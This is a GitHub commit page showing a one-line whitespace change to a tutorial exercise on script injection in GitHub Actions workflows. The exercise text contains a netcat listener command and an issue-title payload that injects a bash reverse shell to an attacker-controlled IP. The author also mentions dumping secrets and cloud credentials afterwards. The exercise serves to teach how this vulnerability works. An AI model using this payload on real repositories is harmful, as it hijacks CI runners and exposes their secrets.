Skip to content
This repository has been archived by the owner on Nov 29, 2023. It is now read-only.

Commit

Permalink
newline
Browse files Browse the repository at this point in the history
  • Loading branch information
robandpdx committed Sep 22, 2023
1 parent 7f69c1a commit cc2e9b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion exercises/exercise-1.md
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ Let's create a new issue with this title and see what happens. We observe that t
<img width="1042" alt="Screenshot 2023-08-30 at 7 38 43 PM" src="https://github.com/robandpdx/workflow-script-injection/assets/95243761/e3fa3917-2834-45cc-a297-d25614c3185e">

Ok. Big deal. So we were able to see what is in the workspace directory. Who cares?
Now let's try something a little more sinister...
Now let's try something a little more sinister...
Spin up a linux vm in the cloud that has a public IP address. Login and run `nc -nvlp 1337`. Then open a new issue with the title `octocat"; bash -i >& /dev/tcp/<YOUR-VM-IP-ADDRESS>/1337 0>&1 ; ls -l $GITHUB_WORKSPACE"`

Now I have a shell on the runner! This is a great "foot in the door" from which I can attemp other exploits, like dumping secrets or cloud credentials to use in other attacks.

0 comments on commit cc2e9b2

Please sign in to comment.